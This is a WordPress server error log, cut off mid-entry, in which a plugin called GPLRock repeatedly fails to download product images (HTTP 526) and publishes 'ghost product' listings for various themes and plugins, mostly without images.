https://meldwp.com/wp-content/uploads/twitter-feeds-for-elementor-wordpress-plugin-22499.webp [07-Apr-2026 03:43:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: twitter-feeds-for-elementor-wordpress-plugin [07-Apr-2026 03:43:43 UTC] GPLRock: Image download failed for product 3d-perspective-slider-addon-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:43:45 UTC] GPLRock: Image download failed for product 3d-perspective-slider-addon-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:43:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/3d-perspective-slider-addon-for-wpbakery-page-builder-25384.webp for product 3d-perspective-slider-addon-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 03:43:47 UTC] GPLRock: Image download failed for product 3d-perspective-slider-addon-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:43:49 UTC] GPLRock: Image download failed for product 3d-perspective-slider-addon-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:43:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/3d-perspective-slider-addon-for-wpbakery-page-builder-25384.webp for product 3d-perspective-slider-addon-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 03:43:51 UTC] GPLRock WARNING: Image download failed for product 3d-perspective-slider-addon-for-wpbakery-page-builder. URL: https://meldwp.com/wp-content/uploads/3d-perspective-slider-addon-for-wpbakery-page-builder-25384.webp [07-Apr-2026 03:43:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: 3d-perspective-slider-addon-for-wpbakery-page-builder [07-Apr-2026 03:43:51 UTC] GPLRock: Image download failed for product eleblog-elementor-magazine-and-blog-addons (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:43:53 UTC] GPLRock: Image download failed for product eleblog-elementor-magazine-and-blog-addons (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:43:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eleblog---elementor-magazine-and-blog-addons-9462.webp for product eleblog-elementor-magazine-and-blog-addons after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 03:43:56 UTC] GPLRock: Image download failed for product eleblog-elementor-magazine-and-blog-addons (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:43:58 UTC] GPLRock: Image download failed for product eleblog-elementor-magazine-and-blog-addons (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:44:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eleblog---elementor-magazine-and-blog-addons-9462.webp for product eleblog-elementor-magazine-and-blog-addons after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 03:44:00 UTC] GPLRock WARNING: Image download failed for product eleblog-elementor-magazine-and-blog-addons. URL: https://meldwp.com/wp-content/uploads/eleblog---elementor-magazine-and-blog-addons-9462.webp [07-Apr-2026 03:44:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: eleblog-elementor-magazine-and-blog-addons [07-Apr-2026 03:44:00 UTC] GPLRock: Image download failed for product just-forms-advanced (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:44:02 UTC] GPLRock: Image download failed for product just-forms-advanced (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:44:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/just-forms-advanced-1718.webp for product just-forms-advanced after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 03:44:04 UTC] GPLRock: Image download failed for product just-forms-advanced (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:44:06 UTC] GPLRock: Image download failed for product just-forms-advanced (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:44:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/just-forms-advanced-1718.webp for product just-forms-advanced after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 03:44:08 UTC] GPLRock WARNING: Image download failed for product just-forms-advanced. URL: https://meldwp.com/wp-content/uploads/just-forms-advanced-1718.webp [07-Apr-2026 03:44:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: just-forms-advanced [07-Apr-2026 03:44:34 UTC] GPLRock: Image download failed for product woocommerce-notification-boost-your-sales-live-feed-sales-recent-sales-popup-upsells (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:44:36 UTC] GPLRock: Image download failed for product woocommerce-notification-boost-your-sales-live-feed-sales-recent-sales-popup-upsells (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:44:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-notification--boost-your-sales---live-feed-sales---recent-sales-popu-1438.webp for product woocommerce-notification-boost-your-sales-live-feed-sales-recent-sales-popup-upsells after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 03:44:39 UTC] GPLRock: Image download failed for product woocommerce-notification-boost-your-sales-live-feed-sales-recent-sales-popup-upsells (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:44:41 UTC] GPLRock: Image download failed for product woocommerce-notification-boost-your-sales-live-feed-sales-recent-sales-popup-upsells (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:44:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-notification--boost-your-sales---live-feed-sales---recent-sales-popu-1438.webp for product woocommerce-notification-boost-your-sales-live-feed-sales-recent-sales-popup-upsells after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 03:44:43 UTC] GPLRock WARNING: Image download failed for product woocommerce-notification-boost-your-sales-live-feed-sales-recent-sales-popup-upsells. URL: https://meldwp.com/wp-content/uploads/woocommerce-notification--boost-your-sales---live-feed-sales---recent-sales-popu-1438.webp [07-Apr-2026 03:44:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-notification-boost-your-sales-live-feed-sales-recent-sales-popup-upsells [07-Apr-2026 03:44:43 UTC] GPLRock: Image download failed for product oasis-modern-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:44:45 UTC] GPLRock: Image download failed for product oasis-modern-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:44:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/oasis---modern-woocommerce-theme-16546.webp for product oasis-modern-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 03:44:47 UTC] GPLRock: Image download failed for product oasis-modern-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:44:49 UTC] GPLRock: Image download failed for product oasis-modern-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:44:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/oasis---modern-woocommerce-theme-16546.webp for product oasis-modern-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 03:44:51 UTC] GPLRock WARNING: Image download failed for product oasis-modern-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/oasis---modern-woocommerce-theme-16546.webp [07-Apr-2026 03:44:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: oasis-modern-woocommerce-theme [07-Apr-2026 03:44:52 UTC] GPLRock: Image downloaded successfully for product ameron-personal-portfolio-or-cvresume-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5576c3b1.webp [07-Apr-2026 03:44:52 UTC] GPLRock: Using pre-downloaded image for product ameron-personal-portfolio-or-cvresume-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5576c3b1.webp [07-Apr-2026 03:44:52 UTC] GPLRock: Ghost product published with image - Product ID: ameron-personal-portfolio-or-cvresume-wordpress-theme [07-Apr-2026 03:44:52 UTC] GPLRock: Image download failed for product decoup-wordpress-theme-for-coupons-and-deals (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:44:54 UTC] GPLRock: Image download failed for product decoup-wordpress-theme-for-coupons-and-deals (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:44:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/decoup---wordpress-theme-for-coupons-and-deals-6896.webp for product decoup-wordpress-theme-for-coupons-and-deals after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 03:44:56 UTC] GPLRock: Image download failed for product decoup-wordpress-theme-for-coupons-and-deals (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:44:58 UTC] GPLRock: Image download failed for product decoup-wordpress-theme-for-coupons-and-deals (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:45:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/decoup---wordpress-theme-for-coupons-and-deals-6896.webp for product decoup-wordpress-theme-for-coupons-and-deals after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 03:45:00 UTC] GPLRock WARNING: Image download failed for product decoup-wordpress-theme-for-coupons-and-deals. URL: https://meldwp.com/wp-content/uploads/decoup---wordpress-theme-for-coupons-and-deals-6896.webp [07-Apr-2026 03:45:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: decoup-wordpress-theme-for-coupons-and-deals [07-Apr-2026 03:45:00 UTC] GPLRock: Image download failed for product wellpress-senior-care-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:45:02 UTC] GPLRock: Image download failed for product wellpress-senior-care-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:45:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wellpress---senior-care-wordpress-theme-8084.webp for product wellpress-senior-care-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 03:45:05 UTC] GPLRock: Image download failed for product wellpress-senior-care-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:45:07 UTC] GPLRock: Image download failed for product wellpress-senior-care-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:45:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wellpress---senior-care-wordpress-theme-8084.webp for product wellpress-senior-care-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 03:45:09 UTC] GPLRock WARNING: Image download failed for product wellpress-senior-care-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/wellpress---senior-care-wordpress-theme-8084.webp [07-Apr-2026 03:45:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wellpress-senior-care-wordpress-theme [07-Apr-2026 03:45:09 UTC] GPLRock: Image download failed for product medibuds-medical-marijuana-dispensary-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:45:11 UTC] GPLRock: Image download failed for product medibuds-medical-marijuana-dispensary-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:45:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/medibuds---medical-marijuana-dispensary-wordpress-theme-9276.webp for product medibuds-medical-marijuana-dispensary-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 03:45:13 UTC] GPLRock: Image download failed for product medibuds-medical-marijuana-dispensary-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:45:15 UTC] GPLRock: Image download failed for product medibuds-medical-marijuana-dispensary-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:45:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/medibuds---medical-marijuana-dispensary-wordpress-theme-9276.webp for product medibuds-medical-marijuana-dispensary-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 03:45:18 UTC] GPLRock WARNING: Image download failed for product medibuds-medical-marijuana-dispensary-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/medibuds---medical-marijuana-dispensary-wordpress-theme-9276.webp [07-Apr-2026 03:45:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: medibuds-medical-marijuana-dispensary-wordpress-theme [07-Apr-2026 03:45:18 UTC] GPLRock: Image download failed for product garden-hub-lawn-landscaping-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:45:20 UTC] GPLRock: Image download failed for product garden-hub-lawn-landscaping-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:45:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/garden-hub---lawn--landscaping-wordpress-theme-9579.webp for product garden-hub-lawn-landscaping-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 03:45:22 UTC] GPLRock: Image download failed for product garden-hub-lawn-landscaping-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:45:24 UTC] GPLRock: Image download failed for product garden-hub-lawn-landscaping-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:45:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/garden-hub---lawn--landscaping-wordpress-theme-9579.webp for product garden-hub-lawn-landscaping-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 03:45:26 UTC] GPLRock WARNING: Image download failed for product garden-hub-lawn-landscaping-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/garden-hub---lawn--landscaping-wordpress-theme-9579.webp [07-Apr-2026 03:45:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: garden-hub-lawn-landscaping-wordpress-theme [07-Apr-2026 03:45:26 UTC] GPLRock: Image download failed for product ettore-fashion-store-and-menswear-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:45:29 UTC] GPLRock: Image download failed for product ettore-fashion-store-and-menswear-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:45:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ettore---fashion-store-and-menswear-woocommerce-wordpress-theme-10083.webp for product ettore-fashion-store-and-menswear-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 03:45:31 UTC] GPLRock: Image download failed for product ettore-fashion-store-and-menswear-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:45:33 UTC] GPLRock: Image download failed for product ettore-fashion-store-and-menswear-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:45:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ettore---fashion-store-and-menswear-woocommerce-wordpress-theme-10083.webp for product ettore-fashion-store-and-menswear-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 03:45:35 UTC] GPLRock WARNING: Image download failed for product ettore-fashion-store-and-menswear-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/ettore---fashion-store-and-menswear-woocommerce-wordpress-theme-10083.webp [07-Apr-2026 03:45:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ettore-fashion-store-and-menswear-woocommerce-wordpress-theme [07-Apr-2026 03:45:35 UTC] GPLRock: Image download failed for product sparknex-creative-web-design-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:45:37 UTC] GPLRock: Image download failed for product sparknex-creative-web-design-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:45:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sparknex---creative-web-design-agency-wordpress-theme-13696.webp for product sparknex-creative-web-design-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 03:45:42 UTC] GPLRock: Image download failed for product sparknex-creative-web-design-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:45:44 UTC] GPLRock: Image download failed for product sparknex-creative-web-design-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:45:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sparknex---creative-web-design-agency-wordpress-theme-13696.webp for product sparknex-creative-web-design-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 03:45:46 UTC] GPLRock WARNING: Image download failed for product sparknex-creative-web-design-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/sparknex---creative-web-design-agency-wordpress-theme-13696.webp [07-Apr-2026 03:45:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sparknex-creative-web-design-agency-wordpress-theme [07-Apr-2026 03:45:46 UTC] GPLRock: Image download failed for product massage-therapist-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:45:48 UTC] GPLRock: Image download failed for product massage-therapist-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:45:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/massage-therapist--wordpress-theme-12143.webp for product massage-therapist-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 03:45:51 UTC] GPLRock: Image download failed for product massage-therapist-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:45:53 UTC] GPLRock: Image download failed for product massage-therapist-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 03:45:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/massage-therapist--wordpress-theme-12143.webp for product massage-therapist-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 03:45:55 UTC] GPLRock WARNING: Image download failed for product massage-therapist-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/massage-therapist--wordpress-theme-12143.webp [07-Apr-2026 03:45:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: massage-therapist-wordpress-theme [07-Apr-2026 05:15:52 UTC] GPLRock: Image download failed for product applounge-multipurpose-saas-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:15:54 UTC] GPLRock: Image download failed for product applounge-multipurpose-saas-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:15:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/applounge---multipurpose-saas-wordpress-theme-22633.webp for product applounge-multipurpose-saas-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 05:15:56 UTC] GPLRock: Image download failed for product applounge-multipurpose-saas-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:15:58 UTC] GPLRock: Image download failed for product applounge-multipurpose-saas-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:16:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/applounge---multipurpose-saas-wordpress-theme-22633.webp for product applounge-multipurpose-saas-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 05:16:01 UTC] GPLRock WARNING: Image download failed for product applounge-multipurpose-saas-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/applounge---multipurpose-saas-wordpress-theme-22633.webp [07-Apr-2026 05:16:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: applounge-multipurpose-saas-wordpress-theme [07-Apr-2026 05:16:01 UTC] GPLRock: Image download failed for product timex-creative-template-for-coming-soon-page (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:16:03 UTC] GPLRock: Image download failed for product timex-creative-template-for-coming-soon-page (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:16:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/timex---creative-template-for-coming-soon-page-15860.webp for product timex-creative-template-for-coming-soon-page after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 05:16:05 UTC] GPLRock: Image download failed for product timex-creative-template-for-coming-soon-page (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:16:07 UTC] GPLRock: Image download failed for product timex-creative-template-for-coming-soon-page (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:16:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/timex---creative-template-for-coming-soon-page-15860.webp for product timex-creative-template-for-coming-soon-page after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 05:16:09 UTC] GPLRock WARNING: Image download failed for product timex-creative-template-for-coming-soon-page. URL: https://meldwp.com/wp-content/uploads/timex---creative-template-for-coming-soon-page-15860.webp [07-Apr-2026 05:16:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: timex-creative-template-for-coming-soon-page [07-Apr-2026 05:16:09 UTC] GPLRock: Image download failed for product ashton-lawyer-attorney-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:16:12 UTC] GPLRock: Image download failed for product ashton-lawyer-attorney-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:16:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ashton--lawyer-attorney-wordpress-27748.webp for product ashton-lawyer-attorney-wordpress after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 05:16:14 UTC] GPLRock: Image download failed for product ashton-lawyer-attorney-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:16:16 UTC] GPLRock: Image download failed for product ashton-lawyer-attorney-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:16:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ashton--lawyer-attorney-wordpress-27748.webp for product ashton-lawyer-attorney-wordpress after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 05:16:18 UTC] GPLRock WARNING: Image download failed for product ashton-lawyer-attorney-wordpress. URL: https://meldwp.com/wp-content/uploads/ashton--lawyer-attorney-wordpress-27748.webp [07-Apr-2026 05:16:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ashton-lawyer-attorney-wordpress [07-Apr-2026 05:16:18 UTC] GPLRock: Image download failed for product amely-fashion-shop-wordpress-theme-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:16:20 UTC] GPLRock: Image download failed for product amely-fashion-shop-wordpress-theme-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:16:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/amely---fashion-shop-wordpress-theme-for-woocommerce-2074.webp for product amely-fashion-shop-wordpress-theme-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 05:16:22 UTC] GPLRock: Image download failed for product amely-fashion-shop-wordpress-theme-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:16:24 UTC] GPLRock: Image download failed for product amely-fashion-shop-wordpress-theme-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:16:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/amely---fashion-shop-wordpress-theme-for-woocommerce-2074.webp for product amely-fashion-shop-wordpress-theme-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 05:16:27 UTC] GPLRock WARNING: Image download failed for product amely-fashion-shop-wordpress-theme-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/amely---fashion-shop-wordpress-theme-for-woocommerce-2074.webp [07-Apr-2026 05:16:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: amely-fashion-shop-wordpress-theme-for-woocommerce [07-Apr-2026 05:16:27 UTC] GPLRock: Image downloaded successfully for product auora-beauty-salon-and-cosmetics-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d71c95a1.webp [07-Apr-2026 05:16:27 UTC] GPLRock: Using pre-downloaded image for product auora-beauty-salon-and-cosmetics-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d71c95a1.webp [07-Apr-2026 05:16:27 UTC] GPLRock: Ghost product published with image - Product ID: auora-beauty-salon-and-cosmetics-wordpress-theme [07-Apr-2026 05:16:27 UTC] GPLRock: Image download failed for product nur-alternative-renewable-energy-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:16:29 UTC] GPLRock: Image download failed for product nur-alternative-renewable-energy-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:16:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nur---alternative--renewable-energy-wordpress-theme-3988.webp for product nur-alternative-renewable-energy-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 05:16:31 UTC] GPLRock: Image download failed for product nur-alternative-renewable-energy-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:16:33 UTC] GPLRock: Image download failed for product nur-alternative-renewable-energy-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:16:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nur---alternative--renewable-energy-wordpress-theme-3988.webp for product nur-alternative-renewable-energy-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 05:16:36 UTC] GPLRock WARNING: Image download failed for product nur-alternative-renewable-energy-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/nur---alternative--renewable-energy-wordpress-theme-3988.webp [07-Apr-2026 05:16:36 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: nur-alternative-renewable-energy-wordpress-theme [07-Apr-2026 05:16:36 UTC] GPLRock: Image download failed for product nelva-corporate-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:16:38 UTC] GPLRock: Image download failed for product nelva-corporate-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:16:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nelva---corporate-wordpress-theme-17928.webp for product nelva-corporate-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 05:16:40 UTC] GPLRock: Image download failed for product nelva-corporate-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:16:42 UTC] GPLRock: Image download failed for product nelva-corporate-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:16:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nelva---corporate-wordpress-theme-17928.webp for product nelva-corporate-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 05:16:44 UTC] GPLRock WARNING: Image download failed for product nelva-corporate-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/nelva---corporate-wordpress-theme-17928.webp [07-Apr-2026 05:16:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: nelva-corporate-wordpress-theme [07-Apr-2026 05:16:44 UTC] GPLRock: Image download failed for product villoz-villa-holidays-rental-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:16:46 UTC] GPLRock: Image download failed for product villoz-villa-holidays-rental-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:16:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/villoz---villa--holidays-rental-wordpress-theme-33773.webp for product villoz-villa-holidays-rental-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 05:16:49 UTC] GPLRock: Image download failed for product villoz-villa-holidays-rental-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:16:51 UTC] GPLRock: Image download failed for product villoz-villa-holidays-rental-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:16:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/villoz---villa--holidays-rental-wordpress-theme-33773.webp for product villoz-villa-holidays-rental-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 05:16:53 UTC] GPLRock WARNING: Image download failed for product villoz-villa-holidays-rental-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/villoz---villa--holidays-rental-wordpress-theme-33773.webp [07-Apr-2026 05:16:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: villoz-villa-holidays-rental-wordpress-theme [07-Apr-2026 05:16:53 UTC] GPLRock: Image download failed for product 